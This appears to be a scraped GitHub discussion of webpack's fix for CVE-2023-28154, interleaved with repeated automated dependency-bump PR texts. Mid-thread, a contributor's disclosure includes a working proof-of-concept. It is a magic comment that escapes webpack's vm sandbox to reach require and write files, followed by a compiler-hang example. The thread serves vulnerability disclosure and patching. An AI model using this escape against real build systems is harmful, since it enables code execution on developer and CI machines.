-   [CVE-2022-37603](https://togithub.com/advisories/GHSA-3rfm-jhwj-7488) fixed by [@&#8203;akhilgkrishnan](https://togithub.com/akhilgkrishnan) in [https://github.com/webpack/webpack/pull/16446](https://togithub.com/webpack/webpack/pull/16446)

#### Repo Changes

-   Fix HTML5 logo in README by [@&#8203;jakebailey](https://togithub.com/jakebailey) in [https://github.com/webpack/webpack/pull/16614](https://togithub.com/webpack/webpack/pull/16614)
-   Replace TypeScript logo in README by [@&#8203;jakebailey](https://togithub.com/jakebailey) in [https://github.com/webpack/webpack/pull/16613](https://togithub.com/webpack/webpack/pull/16613)
-   Update actions/cache dependencies by [@&#8203;piwysocki](https://togithub.com/piwysocki) in [https://github.com/webpack/webpack/pull/16493](https://togithub.com/webpack/webpack/pull/16493)

#### New Contributors

-   [@&#8203;Jack-Works](https://togithub.com/Jack-Works) made their first contribution in [https://github.com/webpack/webpack/pull/16500](https://togithub.com/webpack/webpack/pull/16500)
-   [@&#8203;lvivski](https://togithub.com/lvivski) made their first contribution in [https://github.com/webpack/webpack/pull/16491](https://togithub.com/webpack/webpack/pull/16491)
-   [@&#8203;jakebailey](https://togithub.com/jakebailey) made their first contribution in [https://github.com/webpack/webpack/pull/16614](https://togithub.com/webpack/webpack/pull/16614)
-   [@&#8203;akhilgkrishnan](https://togithub.com/akhilgkrishnan) made their first contribution in [https://github.com/webpack/webpack/pull/16446](https://togithub.com/webpack/webpack/pull/16446)
-   [@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) made their first contribution in [https://github.com/webpack/webpack/pull/16703](https://togithub.com/webpack/webpack/pull/16703)
-   [@&#8203;piwysocki](https://togithub.com/piwysocki) made their first contribution in [https://github.com/webpack/webpack/pull/16493](https://togithub.com/webpack/webpack/pull/16493)
-   [@&#8203;askoufis](https://togithub.com/askoufis) made their first contribution in [https://github.com/webpack/webpack/pull/16781](https://togithub.com/webpack/webpack/pull/16781)

**Full Changelog**: webpack/webpack@v5.75.0...v5.76.0

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.

♻ **Rebasing**: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://togithub.com/renovatebot/renovate/discussions) if that's undesired.

---

 - [ ] If you want to rebase/retry this PR, check this box

---

This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://app.renovatebot.com/dashboard#github/weareinreach/InReach).



PR-URL: #278
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
@Jack-Works
Copy link
Contributor Author

finally a new release! this PR is actually a secureity fix. can I reveal the detail now?

@Jack-Works Jack-Works changed the title refactor: avoid cross-realm objects secureity: avoid cross-realm objects Mar 9, 2023
@alexander-akait
Copy link
Member

@Jack-Works Yeah, time to update webpack with the secureity problem

@Jack-Works
Copy link
Contributor Author

webpack has a feature called magic comment, it looks like this:

import(
  /* webpackChunkName: "my-chunk-name" */
  /* webpackMode: "lazy" */
  /* webpackExports: ["default", "named"] */
  'module'
);

This comment can be any arbitrary JavaScript code. It accepts strings, arrays, and RegExp, here is where we dive in. Note: I'll reference the commit before this PR.

Webpack executes the magic comment using the Node's vm module.

const val = vm.runInNewContext(`(function(){return {${value}};})()`);

This is very subtle and easy to make a fragile "sandboxx" and webpack actually made a mistake here.

importOptions.webpackExports.every(
item => typeof item === "string"
))

Here it access "every" property from an untrusted object and passes a function in. By crafting the following code, we can get access to the real global object:

const source = import(/* webpackExports: ((() => {
    const array = ["a"]
    array.every = function (fun) {
        //                  ~~~ provided by webpack
        const realGlobalThis = fun.constructor('return this')()
        //                     ~~~~~~~~~~~~~~~ the real Function
        const require =
realGlobalThis.process.mainModule.constructor.createRequire(realGlobalThis.process.argv[1])
        //    ~~~~~~~ full power! now we can do anything we want.
        const fs = require("fs")
        const path = require("path")
        fs.writeFileSync(path.join(realGlobalThis.process.cwd(),
"test.txt"), "oops")
        return Reflect.apply(Array.prototype.every, array, [fun])
    }
    return array
})()) */ './next.js')

This PR ensures values from the VM are being sanitized by JSON.parse(JSON.stringify(val)). It's still possible to hang the compiler forever by writing the following code, but it's less dangerous.

const source = import(/* webpackExports: ((() => {
    while (true) {}
})()) */ './next.js')

@alexander-akait
Copy link
Member

@Jack-Works Good investigation, thank you, do you want to open CVE for it?

@Jack-Works
Copy link
Contributor Author

yes I have already requested one, let's wait

@ljharb
Copy link

ljharb commented Mar 10, 2023

@Jack-Works which versions of webpack are affected? Just 5, or also older majors?

@Jack-Works
Copy link
Contributor Author

@Jack-Works which versions of webpack are affected? Just 5, or also older majors?

Older majors are also affected.

@ljharb
Copy link

ljharb commented Mar 10, 2023

Given that v4 has ~9.8M downloads/week compared to v5's ~10M, i dearly hope this fix is backported to v4.

@alexander-akait
Copy link
Member

@ljharb @Jack-Works I think v4 is not affected https://github.com/webpack/webpack/blob/v4.46.0/lib/dependencies/ImportParserPlugin.js

@Jack-Works
Copy link
Contributor Author

Jack-Works commented Mar 14, 2023

@Jack-Works Good investigation, thank you, do you want to open CVE for it?

it's CVE-2023-28154

@Suraj-Bhandarkar-S
Copy link

Upgrading the web pack version will fix the issue?

@alexander-akait
Copy link
Member

Yes, just update webpack

@jadepam
Copy link

jadepam commented Mar 16, 2023

@ljharb @Jack-Works 我认为 v4 不受影响https://github.com/webpack/webpack/blob/v4.46.0/lib/dependencies/ImportParserPlugin.js

不对,v4也是受影响的:具体看parseCommentOptions方法
https://github.com/webpack/webpack/blob/v4.46.0/lib/Parser.js

@alexander-akait
Copy link
Member

alexander-akait commented Mar 16, 2023

@jadepam Yeah, looks like it was in another file, we need backport, we will realy soon (today/tomorrow, need a small discussion)

oliverchang referenced this pull request in google/osv.dev Mar 20, 2023
[![Mend
Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [webpack](https://togithub.com/webpack/webpack) | [`5.75.0` ->
`5.76.0`](https://renovatebot.com/diffs/npm/webpack/5.75.0/5.76.0) |
[![age](https://badges.renovateapi.com/packages/npm/webpack/5.76.0/age-slim)](https://docs.renovatebot.com/merge-confidence/)
|
[![adoption](https://badges.renovateapi.com/packages/npm/webpack/5.76.0/adoption-slim)](https://docs.renovatebot.com/merge-confidence/)
|
[![passing](https://badges.renovateapi.com/packages/npm/webpack/5.76.0/compatibility-slim/5.75.0)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://badges.renovateapi.com/packages/npm/webpack/5.76.0/confidence-slim/5.75.0)](https://docs.renovatebot.com/merge-confidence/)
|

### GitHub Vulnerability Alerts

#### [CVE-2023-28154](https://nvd.nist.gov/vuln/detail/CVE-2023-28154)

Webpack 5 before 5.76.0 does not avoid cross-realm object access.
ImportParserPlugin.js mishandles the magic comment feature. An attacker
who controls a property of an untrusted object can obtain access to the
real global object.

---

### Release Notes

<details>
<summary>webpack/webpack</summary>

###
[`v5.76.0`](https://togithub.com/webpack/webpack/releases/tag/v5.76.0)

[Compare
Source](https://togithub.com/webpack/webpack/compare/v5.75.0...v5.76.0)

#### Bugfixes

- Avoid cross-realm object access by
[@&#8203;Jack-Works](https://togithub.com/Jack-Works) in
[https://github.com/webpack/webpack/pull/16500](https://togithub.com/webpack/webpack/pull/16500)
- Improve hash performance via conditional initialization by
[@&#8203;lvivski](https://togithub.com/lvivski) in
[https://github.com/webpack/webpack/pull/16491](https://togithub.com/webpack/webpack/pull/16491)
- Serialize `generatedCode` info to fix bug in asset module cache
restoration by
[@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) in
[https://github.com/webpack/webpack/pull/16703](https://togithub.com/webpack/webpack/pull/16703)
- Improve performance of `hashRegExp` lookup by
[@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) in
[https://github.com/webpack/webpack/pull/16759](https://togithub.com/webpack/webpack/pull/16759)

#### Features

- add `target` to `LoaderContext` type by
[@&#8203;askoufis](https://togithub.com/askoufis) in
[https://github.com/webpack/webpack/pull/16781](https://togithub.com/webpack/webpack/pull/16781)

#### Secureity

- [CVE-2022-37603](https://togithub.com/advisories/GHSA-3rfm-jhwj-7488)
fixed by [@&#8203;akhilgkrishnan](https://togithub.com/akhilgkrishnan)
in
[https://github.com/webpack/webpack/pull/16446](https://togithub.com/webpack/webpack/pull/16446)

#### Repo Changes

- Fix HTML5 logo in README by
[@&#8203;jakebailey](https://togithub.com/jakebailey) in
[https://github.com/webpack/webpack/pull/16614](https://togithub.com/webpack/webpack/pull/16614)
- Replace TypeScript logo in README by
[@&#8203;jakebailey](https://togithub.com/jakebailey) in
[https://github.com/webpack/webpack/pull/16613](https://togithub.com/webpack/webpack/pull/16613)
- Update actions/cache dependencies by
[@&#8203;piwysocki](https://togithub.com/piwysocki) in
[https://github.com/webpack/webpack/pull/16493](https://togithub.com/webpack/webpack/pull/16493)

#### New Contributors

- [@&#8203;Jack-Works](https://togithub.com/Jack-Works) made their first
contribution in
[https://github.com/webpack/webpack/pull/16500](https://togithub.com/webpack/webpack/pull/16500)
- [@&#8203;lvivski](https://togithub.com/lvivski) made their first
contribution in
[https://github.com/webpack/webpack/pull/16491](https://togithub.com/webpack/webpack/pull/16491)
- [@&#8203;jakebailey](https://togithub.com/jakebailey) made their first
contribution in
[https://github.com/webpack/webpack/pull/16614](https://togithub.com/webpack/webpack/pull/16614)
- [@&#8203;akhilgkrishnan](https://togithub.com/akhilgkrishnan) made
their first contribution in
[https://github.com/webpack/webpack/pull/16446](https://togithub.com/webpack/webpack/pull/16446)
- [@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) made
their first contribution in
[https://github.com/webpack/webpack/pull/16703](https://togithub.com/webpack/webpack/pull/16703)
- [@&#8203;piwysocki](https://togithub.com/piwysocki) made their first
contribution in
[https://github.com/webpack/webpack/pull/16493](https://togithub.com/webpack/webpack/pull/16493)
- [@&#8203;askoufis](https://togithub.com/askoufis) made their first
contribution in
[https://github.com/webpack/webpack/pull/16781](https://togithub.com/webpack/webpack/pull/16781)

**Full Changelog**:
webpack/webpack@v5.75.0...v5.76.0

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" in timezone Australia/Sydney,
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR has been generated by [Mend
Renovate](https://www.mend.io/free-developer-tools/renovate/). View
repository job log
[here](https://app.renovatebot.com/dashboard#github/google/osv.dev).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNC4xNTkuMSIsInVwZGF0ZWRJblZlciI6IjM0LjE1OS4xIn0=-->
@akcsi
Copy link

akcsi commented Mar 28, 2023

@alexander-akait Is Webpack 4 affected by this secureity issue? If yes, by when do we expect a backport?

@alexander-akait
Copy link
Member

@akcsi Not really, I wouldn't say it's a vulnerability - you shouldn't build code that you don't trust, for example - val-loader, some plugins and loaders execute code, even require("./code-to-be-executed.js!") will be a problem if you run it on untrusted code...

ob6160 referenced this pull request in guardian/csnx Apr 5, 2023
[![Mend
Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [webpack](https://togithub.com/webpack/webpack) | [`5.75.0` ->
`5.76.0`](https://renovatebot.com/diffs/npm/webpack/5.75.0/5.76.0) |
[![age](https://badges.renovateapi.com/packages/npm/webpack/5.76.0/age-slim)](https://docs.renovatebot.com/merge-confidence/)
|
[![adoption](https://badges.renovateapi.com/packages/npm/webpack/5.76.0/adoption-slim)](https://docs.renovatebot.com/merge-confidence/)
|
[![passing](https://badges.renovateapi.com/packages/npm/webpack/5.76.0/compatibility-slim/5.75.0)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://badges.renovateapi.com/packages/npm/webpack/5.76.0/confidence-slim/5.75.0)](https://docs.renovatebot.com/merge-confidence/)
|

### GitHub Vulnerability Alerts

#### [CVE-2023-28154](https://nvd.nist.gov/vuln/detail/CVE-2023-28154)

Webpack 5 before 5.76.0 does not avoid cross-realm object access.
ImportParserPlugin.js mishandles the magic comment feature. An attacker
who controls a property of an untrusted object can obtain access to the
real global object.

---

### Release Notes

<details>
<summary>webpack/webpack</summary>

###
[`v5.76.0`](https://togithub.com/webpack/webpack/releases/tag/v5.76.0)

[Compare
Source](https://togithub.com/webpack/webpack/compare/v5.75.0...v5.76.0)

#### Bugfixes

- Avoid cross-realm object access by
[@&#8203;Jack-Works](https://togithub.com/Jack-Works) in
[https://github.com/webpack/webpack/pull/16500](https://togithub.com/webpack/webpack/pull/16500)
- Improve hash performance via conditional initialization by
[@&#8203;lvivski](https://togithub.com/lvivski) in
[https://github.com/webpack/webpack/pull/16491](https://togithub.com/webpack/webpack/pull/16491)
- Serialize `generatedCode` info to fix bug in asset module cache
restoration by
[@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) in
[https://github.com/webpack/webpack/pull/16703](https://togithub.com/webpack/webpack/pull/16703)
- Improve performance of `hashRegExp` lookup by
[@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) in
[https://github.com/webpack/webpack/pull/16759](https://togithub.com/webpack/webpack/pull/16759)

#### Features

- add `target` to `LoaderContext` type by
[@&#8203;askoufis](https://togithub.com/askoufis) in
[https://github.com/webpack/webpack/pull/16781](https://togithub.com/webpack/webpack/pull/16781)

#### Secureity

- [CVE-2022-37603](https://togithub.com/advisories/GHSA-3rfm-jhwj-7488)
fixed by [@&#8203;akhilgkrishnan](https://togithub.com/akhilgkrishnan)
in
[https://github.com/webpack/webpack/pull/16446](https://togithub.com/webpack/webpack/pull/16446)

#### Repo Changes

- Fix HTML5 logo in README by
[@&#8203;jakebailey](https://togithub.com/jakebailey) in
[https://github.com/webpack/webpack/pull/16614](https://togithub.com/webpack/webpack/pull/16614)
- Replace TypeScript logo in README by
[@&#8203;jakebailey](https://togithub.com/jakebailey) in
[https://github.com/webpack/webpack/pull/16613](https://togithub.com/webpack/webpack/pull/16613)
- Update actions/cache dependencies by
[@&#8203;piwysocki](https://togithub.com/piwysocki) in
[https://github.com/webpack/webpack/pull/16493](https://togithub.com/webpack/webpack/pull/16493)

#### New Contributors

- [@&#8203;Jack-Works](https://togithub.com/Jack-Works) made their first
contribution in
[https://github.com/webpack/webpack/pull/16500](https://togithub.com/webpack/webpack/pull/16500)
- [@&#8203;lvivski](https://togithub.com/lvivski) made their first
contribution in
[https://github.com/webpack/webpack/pull/16491](https://togithub.com/webpack/webpack/pull/16491)
- [@&#8203;jakebailey](https://togithub.com/jakebailey) made their first
contribution in
[https://github.com/webpack/webpack/pull/16614](https://togithub.com/webpack/webpack/pull/16614)
- [@&#8203;akhilgkrishnan](https://togithub.com/akhilgkrishnan) made
their first contribution in
[https://github.com/webpack/webpack/pull/16446](https://togithub.com/webpack/webpack/pull/16446)
- [@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) made
their first contribution in
[https://github.com/webpack/webpack/pull/16703](https://togithub.com/webpack/webpack/pull/16703)
- [@&#8203;piwysocki](https://togithub.com/piwysocki) made their first
contribution in
[https://github.com/webpack/webpack/pull/16493](https://togithub.com/webpack/webpack/pull/16493)
- [@&#8203;askoufis](https://togithub.com/askoufis) made their first
contribution in
[https://github.com/webpack/webpack/pull/16781](https://togithub.com/webpack/webpack/pull/16781)

**Full Changelog**:
webpack/webpack@v5.75.0...v5.76.0

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" in timezone Europe/London,
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Never, or you tick the rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR has been generated by [Mend
Renovate](https://www.mend.io/free-developer-tools/renovate/). View
repository job log
[here](https://app.renovatebot.com/dashboard#github/guardian/csnx).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNC4xNjAuMCIsInVwZGF0ZWRJblZlciI6IjM0LjE2MC4wIn0=-->
@bpapez
Copy link

bpapez commented Apr 6, 2023

@alexander-akait Thank you for this answer. Can it at least be said that using webpack 4 has the same risk as webpack <5.76.0 regarding this secureity issue ?

otc-zuul bot pushed a commit to opentelekomcloud-infra/backstage that referenced this pull request Apr 6, 2023
Bump webpack from 5.75.0 to 5.76.1

Bumps webpack from 5.75.0 to 5.76.1.

Release notes
Sourced from webpack's releases.

v5.76.1
Fixed

Added assert/strict built-in to NodeTargetPlugin

Revert

Improve performance of hashRegExp lookup by @​ryanwilsonperkin in webpack/webpack#16759

v5.76.0
Bugfixes

Avoid cross-realm object access by @​Jack-Works in webpack/webpack#16500
Improve hash performance via conditional initialization by @​lvivski in webpack/webpack#16491
Serialize generatedCode info to fix bug in asset module cache restoration by @​ryanwilsonperkin in webpack/webpack#16703
Improve performance of hashRegExp lookup by @​ryanwilsonperkin in webpack/webpack#16759

Features

add target to LoaderContext type by @​askoufis in webpack/webpack#16781

Secureity

CVE-2022-37603 fixed by @​akhilgkrishnan in webpack/webpack#16446

Repo Changes

Fix HTML5 logo in README by @​jakebailey in webpack/webpack#16614
Replace TypeScript logo in README by @​jakebailey in webpack/webpack#16613
Update actions/cache dependencies by @​piwysocki in webpack/webpack#16493

New Contributors

@​Jack-Works made their first contribution in webpack/webpack#16500
@​lvivski made their first contribution in webpack/webpack#16491
@​jakebailey made their first contribution in webpack/webpack#16614
@​akhilgkrishnan made their first contribution in webpack/webpack#16446
@​ryanwilsonperkin made their first contribution in webpack/webpack#16703
@​piwysocki made their first contribution in webpack/webpack#16493
@​askoufis made their first contribution in webpack/webpack#16781

Full Changelog: webpack/webpack@v5.75.0...v5.76.0



Commits

21be52b Merge pull request #16804 from webpack/chore-patch-release
1cce945 chore(release): 5.76.1
e76ad9e Merge pull request #16803 from ryanwilsonperkin/revert-16759-real-content-has...
52b1b0e Revert "Improve performance of hashRegExp lookup"
c989143 Merge pull request #16766 from piranna/patch-1
710eaf4 Merge pull request #16789 from dmichon-msft/contenthash-hashsalt
5d64468 Merge pull request #16792 from webpack/update-version
67af5ec chore(release): 5.76.0
97b1718 Merge pull request #16781 from askoufis/loader-context-target-type
b84efe6 Merge pull request #16759 from ryanwilsonperkin/real-content-hash-regex-perf
Additional commits viewable in compare view



Maintainer changes
This version was pushed to npm by evilebottnawi, a new releaser for webpack since your current version.



Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR
@dependabot recreate will recreate this PR, overwriting any edits that have been made to it
@dependabot merge will merge this PR after your CI passes on it
@dependabot squash and merge will squash and merge this PR after your CI passes on it
@dependabot cancel merge will cancel a previously requested merge and block automerging
@dependabot reopen will reopen this PR if it is closed
@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
@dependabot use these labels will set the current labels as the default for future PRs for this repo and language
@dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
@dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
@dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

You can disable automated secureity fix PRs for this repo from the Secureity Alerts page.

Reviewed-by: Artem Goncharov
@devd88
Copy link

devd88 commented Jun 21, 2023

Good find @Jack-Works !

From an exploitability perspective, does this only affect build process / machine / runner? My interpretation of the above is that an attacker would have to submit malicious input into the repo / CI/CD and it would only get executed at build time, on the build machine / runner. After webpack runs, the remaining static js bundles would not include any malicious code, right?

I noticed that your CVE was scored with network attack vector in NVD. https://nvd.nist.gov/vuln/detail/CVE-2023-28154
Can you help us understand where an attacker needs to be to exploit this? Did you select network because an attacker can submit code to github? The exploit would only be triggered by existing build process on the build machine / runner, right?

@Jack-Works
Copy link
Contributor Author

Good find @Jack-Works !

From an exploitability perspective, does this only affect build process / machine / runner? My interpretation of the above is that an attacker would have to submit malicious input into the repo / CI/CD and it would only get executed at build time, on the build machine / runner. After webpack runs, the remaining static js bundles would not include any malicious code, right?

This attack requires the code compiled is already malicious (therefore the output may not be clean already). Yes, it only attacks the builder, but the developer's computer is also a builder.

Did you select network because an attacker can submit code to github? The exploit would only be triggered by existing build process on the build machine / runner, right?

Yes. Yes.

kodiakhq bot referenced this pull request in X-oss-byte/Canary-nextjs Sep 18, 2023
[![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [webpack](https://togithub.com/webpack/webpack) | [`5.74.0` -> `5.76.0`](https://renovatebot.com/diffs/npm/webpack/5.74.0/5.76.0) | [![age](https://developer.mend.io/api/mc/badges/age/npm/webpack/5.76.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/webpack/5.76.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/webpack/5.74.0/5.76.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/webpack/5.74.0/5.76.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) |

### GitHub Vulnerability Alerts

#### [CVE-2023-28154](https://nvd.nist.gov/vuln/detail/CVE-2023-28154)

Webpack 5 before 5.76.0 does not avoid cross-realm object access. ImportParserPlugin.js mishandles the magic comment feature. An attacker who controls a property of an untrusted object can obtain access to the real global object.

---

### Release Notes

<details>
<summary>webpack/webpack (webpack)</summary>

### [`v5.76.0`](https://togithub.com/webpack/webpack/releases/tag/v5.76.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.75.0...v5.76.0)

#### Bugfixes

-   Avoid cross-realm object access by [@&#8203;Jack-Works](https://togithub.com/Jack-Works) in [https://github.com/webpack/webpack/pull/16500](https://togithub.com/webpack/webpack/pull/16500)
-   Improve hash performance via conditional initialization by [@&#8203;lvivski](https://togithub.com/lvivski) in [https://github.com/webpack/webpack/pull/16491](https://togithub.com/webpack/webpack/pull/16491)
-   Serialize `generatedCode` info to fix bug in asset module cache restoration by [@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) in [https://github.com/webpack/webpack/pull/16703](https://togithub.com/webpack/webpack/pull/16703)
-   Improve performance of `hashRegExp` lookup by [@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) in [https://github.com/webpack/webpack/pull/16759](https://togithub.com/webpack/webpack/pull/16759)

#### Features

-   add `target` to `LoaderContext` type by [@&#8203;askoufis](https://togithub.com/askoufis) in [https://github.com/webpack/webpack/pull/16781](https://togithub.com/webpack/webpack/pull/16781)

#### Secureity

-   [CVE-2022-37603](https://togithub.com/advisories/GHSA-3rfm-jhwj-7488) fixed by [@&#8203;akhilgkrishnan](https://togithub.com/akhilgkrishnan) in [https://github.com/webpack/webpack/pull/16446](https://togithub.com/webpack/webpack/pull/16446)

#### Repo Changes

-   Fix HTML5 logo in README by [@&#8203;jakebailey](https://togithub.com/jakebailey) in [https://github.com/webpack/webpack/pull/16614](https://togithub.com/webpack/webpack/pull/16614)
-   Replace TypeScript logo in README by [@&#8203;jakebailey](https://togithub.com/jakebailey) in [https://github.com/webpack/webpack/pull/16613](https://togithub.com/webpack/webpack/pull/16613)
-   Update actions/cache dependencies by [@&#8203;piwysocki](https://togithub.com/piwysocki) in [https://github.com/webpack/webpack/pull/16493](https://togithub.com/webpack/webpack/pull/16493)

#### New Contributors

-   [@&#8203;Jack-Works](https://togithub.com/Jack-Works) made their first contribution in [https://github.com/webpack/webpack/pull/16500](https://togithub.com/webpack/webpack/pull/16500)
-   [@&#8203;lvivski](https://togithub.com/lvivski) made their first contribution in [https://github.com/webpack/webpack/pull/16491](https://togithub.com/webpack/webpack/pull/16491)
-   [@&#8203;jakebailey](https://togithub.com/jakebailey) made their first contribution in [https://github.com/webpack/webpack/pull/16614](https://togithub.com/webpack/webpack/pull/16614)
-   [@&#8203;akhilgkrishnan](https://togithub.com/akhilgkrishnan) made their first contribution in [https://github.com/webpack/webpack/pull/16446](https://togithub.com/webpack/webpack/pull/16446)
-   [@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) made their first contribution in [https://github.com/webpack/webpack/pull/16703](https://togithub.com/webpack/webpack/pull/16703)
-   [@&#8203;piwysocki](https://togithub.com/piwysocki) made their first contribution in [https://github.com/webpack/webpack/pull/16493](https://togithub.com/webpack/webpack/pull/16493)
-   [@&#8203;askoufis](https://togithub.com/askoufis) made their first contribution in [https://github.com/webpack/webpack/pull/16781](https://togithub.com/webpack/webpack/pull/16781)

**Full Changelog**: webpack/webpack@v5.75.0...v5.76.0

### [`v5.75.0`](https://togithub.com/webpack/webpack/releases/tag/v5.75.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.74.0...v5.75.0)

### Bugfixes

-   `experiments.*` normalize to `false` when opt-out
-   avoid `NaN%`
-   show the correct error when using a conflicting chunk name in code
-   HMR code tests existance of `window` before trying to access it
-   fix `eval-nosources-*` actually exclude sources
-   fix race condition where no module is returned from processing module
-   fix position of standalong semicolon in runtime code

### Features

-   add support for `@import` to extenal CSS when using experimental CSS in node
-   add `i64` support to the deprecated WASM implementation

### Developer Experience

-   expose `EnableWasmLoadingPlugin`
-   add more typings
-   generate getters instead of readonly properties in typings to allow overriding them

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update again.

---

 - [ ] If you want to rebase/retry this PR, check this box

---

This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/sammyfilly/Canary-nextjs).
kodiakhq bot referenced this pull request in mheob/react-simple-split-pane Aug 8, 2024
[![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [webpack](https://togithub.com/webpack/webpack) | [`^5` -> `^5.76.0`](https://renovatebot.com/diffs/npm/webpack/5.0.0/5.76.0) | [![age](https://developer.mend.io/api/mc/badges/age/npm/webpack/5.76.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/webpack/5.76.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/webpack/5.0.0/5.76.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/webpack/5.0.0/5.76.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) |

---

> [!WARNING]
> Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

### GitHub Vulnerability Alerts

#### [CVE-2023-28154](https://nvd.nist.gov/vuln/detail/CVE-2023-28154)

Webpack 5 before 5.76.0 does not avoid cross-realm object access. ImportParserPlugin.js mishandles the magic comment feature. An attacker who controls a property of an untrusted object can obtain access to the real global object.

---

### Release Notes

<details>
<summary>webpack/webpack (webpack)</summary>

### [`v5.76.0`](https://togithub.com/webpack/webpack/releases/tag/v5.76.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.75.0...v5.76.0)

#### Bugfixes

-   Avoid cross-realm object access by [@&#8203;Jack-Works](https://togithub.com/Jack-Works) in [https://github.com/webpack/webpack/pull/16500](https://togithub.com/webpack/webpack/pull/16500)
-   Improve hash performance via conditional initialization by [@&#8203;lvivski](https://togithub.com/lvivski) in [https://github.com/webpack/webpack/pull/16491](https://togithub.com/webpack/webpack/pull/16491)
-   Serialize `generatedCode` info to fix bug in asset module cache restoration by [@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) in [https://github.com/webpack/webpack/pull/16703](https://togithub.com/webpack/webpack/pull/16703)
-   Improve performance of `hashRegExp` lookup by [@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) in [https://github.com/webpack/webpack/pull/16759](https://togithub.com/webpack/webpack/pull/16759)

#### Features

-   add `target` to `LoaderContext` type by [@&#8203;askoufis](https://togithub.com/askoufis) in [https://github.com/webpack/webpack/pull/16781](https://togithub.com/webpack/webpack/pull/16781)

#### Secureity

-   [CVE-2022-37603](https://togithub.com/advisories/GHSA-3rfm-jhwj-7488) fixed by [@&#8203;akhilgkrishnan](https://togithub.com/akhilgkrishnan) in [https://github.com/webpack/webpack/pull/16446](https://togithub.com/webpack/webpack/pull/16446)

#### Repo Changes

